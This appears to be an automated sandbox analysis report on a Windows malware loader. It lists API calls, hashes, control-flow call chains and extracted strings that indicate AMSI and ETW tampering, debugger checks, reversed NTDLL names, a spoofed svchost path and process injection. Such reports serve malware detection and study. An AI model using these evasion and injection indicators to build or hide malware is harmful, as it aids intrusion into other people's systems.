                                                                                                                              • API ID: AddressProc$AllocateHandleMemoryModuleVirtual
                                                                                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                              • API String ID: 1888340430-445027087
                                                                                                                              • Opcode ID: 86fb9c337b59e9621bd0c991b5a6b9cfc3136632c51cb6614653530a14fd96f1
                                                                                                                              • Instruction ID: 85cb8275d7aadc55b8988fbc757027d7eac5b68d2e0b9d3010f19c41a4ca7ed4
                                                                                                                              • Opcode Fuzzy Hash: 86fb9c337b59e9621bd0c991b5a6b9cfc3136632c51cb6614653530a14fd96f1
                                                                                                                              • Instruction Fuzzy Hash: AD118075640208BFEB10EFA4DC51FDEB7BEEB48710F6144A5B908D7640EEB0AB149B60

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02BD8018: GetModuleHandleA.KERNELBASE(?), ref: 02BD806A
                                                                                                                                • Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02BD8113
                                                                                                                                • Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(?,?), ref: 02BD8125
                                                                                                                              • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BD82BD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$HandleMemoryModuleReadVirtual
                                                                                                                              • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                              • API String ID: 36784810-737317276
                                                                                                                              • Opcode ID: 1052ef35b8df6bfd71d223b2a4ca150e862f0320de9b22152f04d50b8cdd8e99
                                                                                                                              • Instruction ID: 6e6098b8d243d674cd4a16b0d5399438a102f01cb5d1dd09954d48452b02d480
                                                                                                                              • Opcode Fuzzy Hash: 1052ef35b8df6bfd71d223b2a4ca150e862f0320de9b22152f04d50b8cdd8e99
                                                                                                                              • Instruction Fuzzy Hash: 21016D75600208BFEB00EFA9D851F9A77FEEB4C710F5184A4F508D7600EA70AA158B24

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02BD8018: GetModuleHandleA.KERNELBASE(?), ref: 02BD806A
                                                                                                                                • Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02BD8113
                                                                                                                                • Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(?,?), ref: 02BD8125
                                                                                                                              • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BD7D6C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$HandleMemoryModuleVirtualWrite
                                                                                                                              • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                              • API String ID: 1525300337-3542721025
                                                                                                                              • Opcode ID: d24ba5f7ab895079c5ab68fedfa82e55d8bcb493e0f89ee0d5d8a903f2ab99c7
                                                                                                                              • Instruction ID: 70024bfb6fc2bf4473a11e3b0189793509c2f347a5d1c10752654bcc02f0251f
                                                                                                                              • Opcode Fuzzy Hash: d24ba5f7ab895079c5ab68fedfa82e55d8bcb493e0f89ee0d5d8a903f2ab99c7
                                                                                                                              • Instruction Fuzzy Hash: 380192B9600208AFEB00EF98DC51EDEB7FEEB4C700F614491B508D3680EA70AA149F60
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02BD8018: GetModuleHandleA.KERNELBASE(?), ref: 02BD806A
                                                                                                                                • Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02BD8113
                                                                                                                                • Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(?,?), ref: 02BD8125
                                                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 02BD8521
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$HandleModuleSectionUnmapView
                                                                                                                              • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                              • API String ID: 858119152-2520021413
                                                                                                                              • Opcode ID: ae8062fb83b421f72a4aa3315af1efb10ad16785e954319acb95b972d4e4a21e
                                                                                                                              • Instruction ID: bdbac4396de81a6ed0849693cc4feb11fc58f82eefaeef3f946a726d547591c9
                                                                                                                              • Opcode Fuzzy Hash: ae8062fb83b421f72a4aa3315af1efb10ad16785e954319acb95b972d4e4a21e
                                                                                                                              • Instruction Fuzzy Hash: 7501A774650208BFEB10EFA4DC51F9E77BFEB49714F9148A0B408D7601EA70AA068A20
                                                                                                                              APIs
                                                                                                                              • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02BDDB03
                                                                                                                              • NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02BDDB6A
                                                                                                                              • NtClose.NTDLL(?), ref: 02BDDB73
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$CloseFileNameName_Write
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1792072161-0
                                                                                                                              • Opcode ID: de975ba270f370445cf45ff7028ed076605a71d993008c9ee4966158f7fee21f
                                                                                                                              • Instruction ID: 7eecde8becc2b732b01b23982e7dadf7b396f01829802f2fb2c52aa9ce18d54b
                                                                                                                              • Opcode Fuzzy Hash: de975ba270f370445cf45ff7028ed076605a71d993008c9ee4966158f7fee21f
                                                                                                                              • Instruction Fuzzy Hash: AF211D72A40309BAEB10EAE4CC52FDEB7BDEB04B04F6040A5B640F71D0E7B46B048B65
                                                                                                                              APIs
                                                                                                                              • RtlInitUnicodeString.NTDLL ref: 02BDDA64
                                                                                                                              • RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02BDDA7A
                                                                                                                              • NtDeleteFile.NTDLL(?), ref: 02BDDA99
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$DeleteFileInitNameName_StringUnicode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1459852867-0
                                                                                                                              • Opcode ID: 6a9ac6eefaf4a7fbe77e26103202ace78ee27565c39af9c686930a314a10ae6b
                                                                                                                              • Instruction ID: 79f8f8b6ece8631b94e81e966fb315fdbd29873e7e433b587c1edd5f0679a120
                                                                                                                              • Opcode Fuzzy Hash: 6a9ac6eefaf4a7fbe77e26103202ace78ee27565c39af9c686930a314a10ae6b
                                                                                                                              • Instruction Fuzzy Hash: A801A7765483497EEF05E7E0CD41BCD77BDAB04700F5180E2D360E6081EA746B04CB20
                                                                                                                              APIs
                                                                                                                              • RtlInitUnicodeString.NTDLL ref: 02BDDA64
                                                                                                                              • RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02BDDA7A
                                                                                                                              • NtDeleteFile.NTDLL(?), ref: 02BDDA99
                                                                                                                                • Part of subcall function 02BC4C0C: SysFreeString.OLEAUT32(?), ref: 02BC4C1A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: PathString$DeleteFileFreeInitNameName_Unicode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2256775434-0
                                                                                                                              • Opcode ID: 0df3e78c2f6c3ccecfbf49ba321dd8d86535b7a9fc5d98e2584e07710ca7b556
                                                                                                                              • Instruction ID: 69d8e23418927d5ba212027828b7a75f5c2bc2fec9716ee1595520cf27a1c982
                                                                                                                              • Opcode Fuzzy Hash: 0df3e78c2f6c3ccecfbf49ba321dd8d86535b7a9fc5d98e2584e07710ca7b556
                                                                                                                              • Instruction Fuzzy Hash: C5014472904209BADB10EBE0CC51FDEB7BDEB08700F6145F1E610E2190FB746B048A60
                                                                                                                              APIs
                                                                                                                              • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02BDDBE3
                                                                                                                              • NtClose.NTDLL(?), ref: 02BDDC5D
                                                                                                                                • Part of subcall function 02BC4C0C: SysFreeString.OLEAUT32(?), ref: 02BC4C1A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$CloseFreeNameName_String
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 11680810-0
                                                                                                                              • Opcode ID: be0cdb1563bdd162b28f4dd5f6baa75fb29edecf4e13d734aca97b1401a9e21d
                                                                                                                              • Instruction ID: 41ea2dcd9360a7034b0f0383cbc7afeb83fe0071f3644cab90cf1717219d6706
                                                                                                                              • Opcode Fuzzy Hash: be0cdb1563bdd162b28f4dd5f6baa75fb29edecf4e13d734aca97b1401a9e21d
                                                                                                                              • Instruction Fuzzy Hash: BC21D6717403097AEB11EAE4CC56FEF77BDAB08700F5004A5B740F71D0EAB4AA058B95
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02BD881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02BD8903), ref: 02BD8860
                                                                                                                                • Part of subcall function 02BD881C: GetProcAddress.KERNEL32(02C21384,00000000), ref: 02BD8879
                                                                                                                                • Part of subcall function 02BD881C: FreeLibrary.KERNEL32(02C21384,00000000,02C21388,Function_000055D8,00000004,02C21398,02C21388,000186A3,00000040,02C2139C,02C21384,00000000,00000000,00000000,00000000,02BD8903), ref: 02BD88E3
                                                                                                                                • Part of subcall function 02BDEB8C: GetModuleHandleW.KERNEL32(KernelBase,?,02BDEF90,UacInitialize,02C1CF00,02BEAFD0,UacScan,02C1CF00,02BEAFD0,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,ScanString), ref: 02BDEB92
                                                                                                                                • Part of subcall function 02BDEB8C: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02BDEBA4
                                                                                                                                • Part of subcall function 02BDEBE8: GetModuleHandleW.KERNEL32(KernelBase), ref: 02BDEBF8
                                                                                                                                • Part of subcall function 02BDEBE8: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02BDEC0A
                                                                                                                                • Part of subcall function 02BDEBE8: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02BDEC21
                                                                                                                                • Part of subcall function 02BCC2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02D158C8,?,02BDFBF6,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,ScanBuffer,02C1CF00,02BEAFD0,OpenSession), ref: 02BCC2FB
                                                                                                                                • Part of subcall function 02BDDBA8: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02BDDBE3
                                                                                                                                • Part of subcall function 02BDDBA8: NtClose.NTDLL(?), ref: 02BDDC5D
                                                                                                                                • Part of subcall function 02BC7E34: GetFileAttributesA.KERNEL32(00000000,?,02BE2A41,ScanString,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,Initialize), ref: 02BC7E3F
                                                                                                                                • Part of subcall function 02BDDAC4: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02BDDB03
                                                                                                                                • Part of subcall function 02BDDAC4: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02BDDB6A
                                                                                                                                • Part of subcall function 02BDDAC4: NtClose.NTDLL(?), ref: 02BDDB73
                                                                                                                                • Part of subcall function 02BD8798: LoadLibraryW.KERNEL32(?,?), ref: 02BD87AC
                                                                                                                                • Part of subcall function 02BD8798: GetProcAddress.KERNEL32(02C21390,BCryptVerifySignature), ref: 02BD87C6
                                                                                                                                • Part of subcall function 02BD8798: FreeLibrary.KERNEL32(02C21390,02C21390,BCryptVerifySignature,bcrypt,?,02C213D0,00000000,02C213A4,02BDA3BF,ScanString,02C213A4,02BDA774,ScanBuffer,02C213A4,02BDA774,Initialize), ref: 02BD8802
                                                                                                                                • Part of subcall function 02BD8704: LoadLibraryW.KERNEL32(amsi), ref: 02BD870D
                                                                                                                                • Part of subcall function 02BD8704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02BD876C
                                                                                                                              • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,02BEB328), ref: 02BE49AF
                                                                                                                                • Part of subcall function 02BDDA3C: RtlInitUnicodeString.NTDLL ref: 02BDDA64
                                                                                                                                • Part of subcall function 02BDDA3C: RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02BDDA7A
                                                                                                                                • Part of subcall function 02BDDA3C: NtDeleteFile.NTDLL(?), ref: 02BDDA99
                                                                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 02BE4BAF
                                                                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 02BE4C05
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FilePath$Library$AddressModuleNameProc$FreeHandleName_$CloseLoadMove$AttributesCheckDebuggerDeleteInitPresentRemoteSleepStringUnicodeWrite
                                                                                                                              • String ID: .url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                                                                              • API String ID: 4208238443-2905671141
                                                                                                                              • Opcode ID: 41b8ab820d41a88390752d678ff86e4f86d4d623ebea2d8e8d690730c7af60e7
                                                                                                                              • Instruction ID: 2cb912228b39ac68268394468256c4debb8d2d590b63c4bbf08855417183b7e5
                                                                                                                              • Opcode Fuzzy Hash: 41b8ab820d41a88390752d678ff86e4f86d4d623ebea2d8e8d690730c7af60e7
                                                                                                                              • Instruction Fuzzy Hash: 18240976B501589FDB11FB64DC90ADE73BABF95300F2045EAE00AA7218DB71AF858F41

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 5349 2be786f-2be7c5f call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc4898 5464 2be8ae9-2be8c6c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc4898 5349->5464 5465 2be7c65-2be7e38 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc4798 call 2bc494c call 2bc4d20 call 2bc4d9c CreateProcessAsUserW 5349->5465 5554 2be9418-2beaa1d call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c * 16 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bd7b90 call 2bd8184 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c ExitProcess 5464->5554 5555 2be8c72-2be8c81 call 2bc4898 5464->5555 5574 2be7e3a-2be7eb1 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c 5465->5574 5575 2be7eb6-2be7fc1 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c 5465->5575 5555->5554 5564 2be8c87-2be8f5a call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bde538 call 2bc480c call 2bc494c call 2bc46a4 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc7e10 5555->5564 5822 2be9212-2be9413 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc49a4 call 2bd8ba8 5564->5822 5823 2be8f60-2be920d call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc4d8c * 2 call 2bc4734 call 2bddac4 5564->5823 5574->5575 5675 2be7fc8-2be82e8 call 2bc49a4 call 2bddc88 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bdcf9c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c 5575->5675 5676 2be7fc3-2be7fc6 5575->5676 5992 2be82ea-2be82fc call 2bd857c 5675->5992 5993 2be8301-2be8ae4 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c ResumeThread call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c CloseHandle call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bd7ecc call 2bd8798 * 6 CloseHandle call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 